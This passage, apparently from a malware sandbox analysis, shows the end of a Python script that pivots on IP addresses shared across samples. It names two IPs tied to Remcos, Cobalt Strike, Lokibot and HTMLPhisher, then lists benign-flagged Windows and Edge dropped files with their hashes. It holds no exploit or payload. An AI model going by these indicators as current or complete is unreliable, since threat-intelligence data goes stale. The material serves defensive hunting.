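        by_ip[r["ip"]]["samples"].add(r["sample"])
        by_ip[r["ip"]]["threats"].update(t for t in r["threats"] if t != "Unknown")
    return dict(by_ip)


def shared_infrastructure(records: list[dict], min_samples: int = 2) -> dict:
    """Keep only IPs seen in at least min_samples distinct samples: the pivot candidates."""
    return {ip: v for ip, v in pivot_by_ip(records).items() if len(v["samples"]) >= min_samples}


if __name__ == "__main__":
    for ip, v in sorted(shared_infrastructure(parse_rows(ROWS)).items(),
                        key=lambda kv: -len(kv[1]["samples"])):
        print(f"{ip}: {len(v['samples'])} samples, families: {', '.join(sorted(v['threats']))}")
```

With the page's full tables as input, 142.215.209.78 and 192.3.243.136 are the addresses that bind the Remcos, Cobalt Strike, Lokibot and HTMLPhisher analyses together; those are the values worth blocking and hunting on first, ahead of the CDN and cloud addresses (Amazon, Microsoft ranges) that appear in the same tables only because the samples fetched ordinary content from them.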
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.8022127453368676
Encrypted: false
SSDEEP: 1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUA5:RJE+Lfki1GjHwU/+vVhWqpw
MD5: E4A04B5946A47199A4681AD17A92409D
SHA1: 554BF7F1DF91DF1564F2B922B1AE1261E6AFBD55
SHA-256: 754C6D9DAFC9E9B17738E5E9F402FE0E3F9A978E07E167334B5D24F19C48EA82
SHA-512: FF883FD8876C831E6715C48F9B39C091ED6E971A7A7915640EA72EF41B9A4BFA585ABD5C886B9507F3D5E33375C4A6B0E5F5D7EA16DFA9F0E5904109BB6616C7
Malicious: false
Preview: ..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xa981a5e2, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1048576
Entropy (8bit): 0.9433629491245563
Encrypted: false
SSDEEP: 1536:rSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:razaHvxXy2V2UR
MD5: 50E23E1AA143D05CB0EB38C2E51105E4
SHA1: 486AFC41B86EE28EF1D1AF309FD94E0F8D48DB05
SHA-256: CC325FD84096B5413D0203CF4A1DEB3BF7188D0D27E26F1DD6E37710A461C08B
SHA-512: 519B0990A9042509A846F9D4D57ED94BA7786AA936199727D011A0AE651702F9646DAFEC742FBAB74B6500E9AC21860EE0547472E145A18932307436178E2EEB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                              Entropy (8bit):0.08197730164060239
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:PmtlEYezmZutnVsl/nqlFcl1ZUlllllkFQButl/illGBnX/l/Tj/k7/t:PdzzuiVsl/qlFclQ/lEqBiQ254
                                                                                                                                                                                                                              MD5:9DA4B9A448A420FABA9013632EE32C01
                                                                                                                                                                                                                              SHA1:D9396594EA2BCFC2272E440B9B8CA20F538DB1B2
                                                                                                                                                                                                                              SHA-256:E30C733B401E77B3A10340DA58D06112BCF69D781AF8A4924B412D119AB9EA5A
                                                                                                                                                                                                                              SHA-512:1F1779F15C85DB148C23F12DBE6978357C1CFA4B31B9BF5AB032687625DA5EA3802DA1E41CB64959B639E41335C0744D963351489FDEB0ECA3746D6552FD3FB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48958
                                                                                                                                                                                                                              Entropy (8bit):6.090810299330451
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:/DXzgWPsj/qlGJqIY8GB4xXrf7LmZjQN/jfgrl8tu+CNKwWE7RTupzKscDX//NPX://Ps+wsI7yOXrAMjsl8UKoRTuiVIoV
                                                                                                                                                                                                                              MD5:2CC0A3EE03E31BAEFECD09AE20C0B2B8
                                                                                                                                                                                                                              SHA1:F31D156AEC34821F7C177643BBA043C2DF8F9539
                                                                                                                                                                                                                              SHA-256:97A8AF73CC22EEFBBCFD7F2D91171EB7363E5C03D65F85E0BA354A04E55B87D8
                                                                                                                                                                                                                              SHA-512:56002FA365D908C4A2273EC16EFCADB8B8CAD9ADEE239C15A2A7178F934E189C565B70C18E8CB9C213799C580382B2E148058339D828C1D36C7DB762FEEEDE1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44711
                                                                                                                                                                                                                              Entropy (8bit):6.096278049343526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xh9uLmZjQN/jfZbhfIMPFMPKwWE7RTupzKscDX//NPm:z/Ps+wsI7yOhnMjiKoRTuiVIos
                                                                                                                                                                                                                              MD5:35D36DC0AC002972494BF494C0AAFCDB
                                                                                                                                                                                                                              SHA1:82EDFECF2662BD3B131BD6391F60242EB04E4C93
                                                                                                                                                                                                                              SHA-256:60FD9B64FF915EBA4FE8601F0CF94016244385A5FF520019B2B384D2DE2A241A
                                                                                                                                                                                                                              SHA-512:D9C3FE6B03CCDFA41C5C0FE19C063B7743E2138E966EF27F5955D9403A86EC9CE4EDA4B40A2FA60C78F8A9A1BB041B4388FDC57A427FB892E6AF5212288F0AA9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48958
                                                                                                                                                                                                                              Entropy (8bit):6.090810299330451
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:/DXzgWPsj/qlGJqIY8GB4xXrf7LmZjQN/jfgrl8tu+CNKwWE7RTupzKscDX//NPX://Ps+wsI7yOXrAMjsl8UKoRTuiVIoV
                                                                                                                                                                                                                              MD5:2CC0A3EE03E31BAEFECD09AE20C0B2B8
                                                                                                                                                                                                                              SHA1:F31D156AEC34821F7C177643BBA043C2DF8F9539
                                                                                                                                                                                                                              SHA-256:97A8AF73CC22EEFBBCFD7F2D91171EB7363E5C03D65F85E0BA354A04E55B87D8
                                                                                                                                                                                                                              SHA-512:56002FA365D908C4A2273EC16EFCADB8B8CAD9ADEE239C15A2A7178F934E189C565B70C18E8CB9C213799C580382B2E148058339D828C1D36C7DB762FEEEDE1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                              Entropy (8bit):0.4145080971859856
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:LBd0/16EC0Wt+F13N9HsHvVV4YyTEUA4Pg1HFOXBWoqi:ld0LfF13XHsHcWUA4PaHGBbqi
                                                                                                                                                                                                                              MD5:834CC643CB6903E79C3DFB236AB08C70
                                                                                                                                                                                                                              SHA1:74441BF91C605128BAE682651094CD933A5F964D
                                                                                                                                                                                                                              SHA-256:4BCE276D9263D85D986C4C85D571CEDE92351EE90FEB575BE82254099DB0649D
                                                                                                                                                                                                                              SHA-512:653C5F7E581AA0EC8059D0C2FB292AF95E14CFC6209C2CF0C81FCB02D71C2128A631FADCE016AA477E9661818949846E95361B9077BF60E38A5CBB97C7821E38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                              Entropy (8bit):4.195531555605597
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPptll:o1GVKCoD4Hxi2ABVsJDZYeulX+
                                                                                                                                                                                                                              MD5:6F31F66D322746DFA960845F4C4E8A15
                                                                                                                                                                                                                              SHA1:22CC9EAF87C966CAFF2E6C568C1D31FBBF9ABE8D
                                                                                                                                                                                                                              SHA-256:DE611AF9189D0C1CC631F9406C71D9950AC6EDA7B4EC10456D68BF55A0B54B25
                                                                                                                                                                                                                              SHA-512:C56CD43A06DAFDED388055B6B1EEB3F2F739414D6D383AEFB6B63B4B119B7AAC60C7487DC6031260FB1E116AD2AB2A8A3569CC9CBD88EE7E2A1F46F2851FE2C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                              Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Preview:.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):10346
Entropy (8bit):5.1341367806862195
Encrypted:false
SSDEEP:192:stQkmw5sBQcsCRIa34Hko4h8MbV+FItQA4kq7NITbUNKJ:stQKsBQcnRXfbGcQxX7NIb
MD5:27EADB3399C6406701850B36879AF39A
SHA1:EC044A4215EBABB53C08BC01AF0064E9EE4EDC75
SHA-256:8FECB9634AFE1AF8BFC10930192790C24138C0521D8094F8CBB9CE68CCE4EDC1
SHA-512:81890FD516DB6DF649004B9F06C382F81BB700F966DE4213FA2C12E47328B67A06053BB473FECE828C7D348FD845A7F456A16D7B769F08BBD3C85880A8190857
Malicious:false
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376418816206161","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13376418824310325","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":885,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":79,"continuous_migration":{"ci_correction_for_holdout_tre

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):33
Entropy (8bit):3.5394429593752084
Encrypted:false
SSDEEP:3:iWstvhYNrkUn:iptAd
MD5:F27314DD366903BBC6141EAE524B0FDE
SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:false
Preview:...m.................DB_VERSION.1

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):307
Entropy (8bit):5.245904198253806
Encrypted:false
SSDEEP:6:HU73r1CHhJ23oH+Tcwtp3hBtB2KLlVU73+q2PCHhJ23oH+Tcwtp3hBWsIFUv:GnYebp3dFLO3+vBYebp3eFUv
MD5:9581D64CA7AF07EA2C8C485AADD83D7D
SHA1:5516E3A20B5791416B149FEE644F8FA5A446F3D2
SHA-256:2A9935A9CE92789B8E9AB766ACC109EA245F577C892B70FF6A29BF5247D0A6A8
SHA-512:58847DD562A13EA77D8D2504B71077E1D22A6ECE9F6059053F654427FC40E0DBF32465906FF0F773F9C6D5C42B3B6639F9B26A207AAE1B42B2DF920509CE9AC8
Malicious:false
Preview:2024/11/18-10:53:44.101 dcc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/18-10:53:44.437 dcc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):41
Entropy (8bit):4.704993772857998
Encrypted:false
SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:false
Preview:.|.."....leveldb.BytewiseComparator......

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:modified
Size (bytes):81875
Entropy (8bit):6.082015074755965
Encrypted:false
SSDEEP:1536:hQ60h81vrPI3lFdSn1EItRjRzkGJTPILJkkcq5OQxa:hKS15tRdAYDI1JcYxa
MD5:47F4783ABFBE22F3E7EAB17BB614B230
SHA1:21B15755351B7E9998F5131CBB842747469D267E
SHA-256:A31EE3779924092801BB446A9E818D32FE5EECCD41F8E1DADA8BFAEB65EB35CF
SHA-512:8F17765E813A2411033363D42F161303455E4C0D26EC2E277DB0D3F38BEC2D08BE29443CC258E539406ADE58A608F8FE7C56A2C2A2F3BF559C6B8E4DC0A7F270
Malicious:false
Preview:...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340967444415546.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):333
Entropy (8bit):5.1766894150156295
Encrypted:false
SSDEEP:6:HU7klQi+q2PCHhJ23oH+Tcwt9Eh1tIFUt8YU752WZmw+YU7IGFNVkwOCHhJ23oH/:GklD+vBYeb9Eh16FUt8152W/+173V56w
MD5:7C44DE0A57609562A7B1904587B6BB6B
SHA1:989201DAFC2D0B8AACE1BD779E0AC11187C8B9FC
SHA-256:875F42BB0C950617881CDEA3591D070549B0FCBEBE5F906A384323E569E01E44
SHA-512:E77C690C79A74F4C2F2CB362A60D4B684E793194C05B9114C3935464D9C0F51D3D4BFBF1CAC100204679870C075DE9AD444EF4FA958C76F2956231A243419218
Malicious:false
Preview:2024/11/18-10:53:43.809 95c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/18-10:53:43.811 95c Recovering log #3.2024/11/18-10:53:43.819 95c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):333
Entropy (8bit):5.1766894150156295
Encrypted:false
SSDEEP:6:HU7klQi+q2PCHhJ23oH+Tcwt9Eh1tIFUt8YU752WZmw+YU7IGFNVkwOCHhJ23oH/:GklD+vBYeb9Eh16FUt8152W/+173V56w
MD5:7C44DE0A57609562A7B1904587B6BB6B
SHA1:989201DAFC2D0B8AACE1BD779E0AC11187C8B9FC
SHA-256:875F42BB0C950617881CDEA3591D070549B0FCBEBE5F906A384323E569E01E44
SHA-512:E77C690C79A74F4C2F2CB362A60D4B684E793194C05B9114C3935464D9C0F51D3D4BFBF1CAC100204679870C075DE9AD444EF4FA958C76F2956231A243419218
Malicious:false
Preview:2024/11/18-10:53:43.809 95c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/18-10:53:43.811 95c Recovering log #3.2024/11/18-10:53:43.819 95c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                              Entropy (8bit):0.45475505266310123
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwjfBLjbw:TouQq3qh7z3bY2LNW9WMcU4B7
                                                                                                                                                                                                                              MD5:B65B96EAC16DC19B6BAE55F5492DDBCC
                                                                                                                                                                                                                              SHA1:B0506F40F84653A5D51D0443DDDFD23B2B6BDD20
                                                                                                                                                                                                                              SHA-256:F41AE2E50AD070100A0A4DABE6B8819CDE7FC4BAE0113AC3301BEB1383CA94D8
                                                                                                                                                                                                                              SHA-512:8FAB93799CB7483C67C6654A9AF44CFD057835E71D866901BB0B65E44F8487C7C8CCF073734C954AAB029FF8A9DBB7E1F0468FEC1E30B6BAC1F456247C79CD15
                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3......@ ..j..........g.....8...n (remainder of the preview is non-printable bytes)
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                              Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                              MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                              Malicious:false
Preview:SQLite format 3......@ ..j...v... .. .....M (remainder of the preview is non-printable bytes)
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0018164538716206493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEZlyFKtl:/M/xT02zJul
                                                                                                                                                                                                                              MD5:5F1A357BE21CAE3BD9D2E1C1B0B9CBB6
                                                                                                                                                                                                                              SHA1:24DC4306FC314CDAE76882F8D2C7AB5CC821C1B5
                                                                                                                                                                                                                              SHA-256:F7A84F371A42D1D6166F8982D247709D97F4410964E1150C02346DEB4F8483EF
                                                                                                                                                                                                                              SHA-512:B198106B1482937808BA6210BDB0398C67F6050D9D6534E715B682B7BD678C456AB4BE0354BD483C43948BF05202E6C4385EE32C9304E13E4FA4C0179F70B690
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                              Entropy (8bit):5.210520084710236
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUPpE9+q2PCHhJ23oH+TcwtnG2tMsIFUt8YU8NJZmw+YU8N9VkwOCHhJ23oH+Tci:Kpi+vBYebn9GFUt8O/+KV56Yebn95J
                                                                                                                                                                                                                              MD5:F3C0FA569858B0E9AF4F667F028D4475
                                                                                                                                                                                                                              SHA1:B7F64CF1B82F913DFDCA643E4B6AEE0ADEE01154
                                                                                                                                                                                                                              SHA-256:659BCF75897ADE2F625371B5D8083567A629DF346D0718EC14990F038C1BE115
                                                                                                                                                                                                                              SHA-512:DC1432410B4F9B6C1E2769553B0BCD24AD248EE066AF5703833EEFBC815D0FFC42E8E15DE01F839110138318B2356BD6332C07BF53F73894D8077BA5F0A3841B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.442 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/18-10:53:35.455 1e2c Recovering log #3.2024/11/18-10:53:35.455 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):348
                                                                                                                                                                                                                              Entropy (8bit):5.210520084710236
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUPpE9+q2PCHhJ23oH+TcwtnG2tMsIFUt8YU8NJZmw+YU8N9VkwOCHhJ23oH+Tci:Kpi+vBYebn9GFUt8O/+KV56Yebn95J
                                                                                                                                                                                                                              MD5:F3C0FA569858B0E9AF4F667F028D4475
                                                                                                                                                                                                                              SHA1:B7F64CF1B82F913DFDCA643E4B6AEE0ADEE01154
                                                                                                                                                                                                                              SHA-256:659BCF75897ADE2F625371B5D8083567A629DF346D0718EC14990F038C1BE115
                                                                                                                                                                                                                              SHA-512:DC1432410B4F9B6C1E2769553B0BCD24AD248EE066AF5703833EEFBC815D0FFC42E8E15DE01F839110138318B2356BD6332C07BF53F73894D8077BA5F0A3841B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.442 1e2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/18-10:53:35.455 1e2c Recovering log #3.2024/11/18-10:53:35.455 1e2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                              MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):16
Entropy (8bit):3.2743974703476995
Encrypted:false
SSDEEP:3:1sjgWIV//Uv:1qIFUv
MD5:46295CAC801E5D4857D09837238A6394
SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:false
Preview:MANIFEST-000001.

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):311
Entropy (8bit):5.190772609381733
Encrypted:false
